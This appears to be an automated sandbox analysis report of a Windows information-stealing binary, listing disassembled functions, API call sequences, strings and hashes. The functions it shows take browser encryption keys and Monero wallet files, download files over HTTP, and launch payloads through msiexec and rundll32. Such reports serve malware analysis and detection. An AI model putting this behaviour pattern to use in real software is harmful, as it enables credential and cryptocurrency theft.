                                                                                  • API String ID: 3246050789-3278919252
                                                                                  • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                                                  • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                                                  Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • memset.MSVCRT ref: 00410C1C
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                                                  • memset.MSVCRT ref: 00410CCD
                                                                                  • memset.MSVCRT ref: 00410CE1
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                  • String ID: .exe
                                                                                  • API String ID: 1395395982-4119554291
                                                                                  • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                                                  • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                                                  Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateGlobalStream
                                                                                  • String ID: image/jpeg
                                                                                  • API String ID: 2244384528-3785015651
                                                                                  • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                                                  • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                                                  Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • strtok_s.MSVCRT ref: 00411307
                                                                                  • strtok_s.MSVCRT ref: 00411750
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 348468850-0
                                                                                  • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                                                  • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                                                  Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell$lstrcpy
                                                                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                  • API String ID: 2507796910-3625054190
                                                                                  • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                                                  • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                                                  Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041429E
                                                                                  • memset.MSVCRT ref: 004142B5
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                                                  • lstrcatA.KERNEL32(?,00909B30), ref: 0041430B
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                                                  • lstrcatA.KERNEL32(?,0090A028), ref: 00414333
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                                                  • StrStrA.SHLWAPI(?,009099C8), ref: 004143F3
                                                                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1191620704-0
                                                                                  • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                                                  • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                                                  Function 00B144E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B14505
                                                                                  • memset.MSVCRT ref: 00B1451C
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B14553
                                                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B14572
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14586
                                                                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 00B1459A
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B18FF7: GetFileAttributesA.KERNEL32(00000000,?,00B01DBB,?,?,0042565C,?,?,00420E1F), ref: 00B19006
                                                                                    • Part of subcall function 00B09F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00B09FA0
                                                                                    • Part of subcall function 00B09F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00B09FF9
                                                                                    • Part of subcall function 00B09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
                                                                                    • Part of subcall function 00B09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
                                                                                    • Part of subcall function 00B09C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
                                                                                    • Part of subcall function 00B09C27: ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
                                                                                    • Part of subcall function 00B09C27: LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
                                                                                    • Part of subcall function 00B09C27: CloseHandle.KERNEL32(000000FF), ref: 00B09D01
                                                                                    • Part of subcall function 00B19627: GlobalAlloc.KERNEL32(00000000,00B14644,00B14644), ref: 00B1963A
                                                                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 00B1465A
                                                                                  • GlobalFree.KERNEL32(?), ref: 00B14779
                                                                                    • Part of subcall function 00B09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D56
                                                                                    • Part of subcall function 00B09D27: LocalAlloc.KERNEL32(00000040,?,?,?,00B05155,00000000,?), ref: 00B09D68
                                                                                    • Part of subcall function 00B09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D91
                                                                                    • Part of subcall function 00B09D27: LocalFree.KERNEL32(?,?,?,?,00B05155,00000000,?), ref: 00B09DA6
                                                                                    • Part of subcall function 00B0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1470A
                                                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 00B14727
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B14739
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00B1474C
                                                                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 00B1475B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1191620704-0
                                                                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                  • Instruction ID: 0d8963393e6e3a3d17b47fb0e9a945a11c01ab917ab3421c9310d2f934a0ca42
                                                                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                  • Instruction Fuzzy Hash: EB7130B6900218BBDB14FBE0DC89FEE77B9AF49300F4085D8B60596181EB75DB89CB51
                                                                                  Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00401327
                                                                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                                                  • memset.MSVCRT ref: 00401516
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                  • API String ID: 1930502592-218353709
                                                                                  • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                                                  • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                                                  Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00906260), ref: 00406303
                                                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0090B380,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                  • API String ID: 3532888709-1526165396
                                                                                  • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                                                  • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                                                  Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 00406147
                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
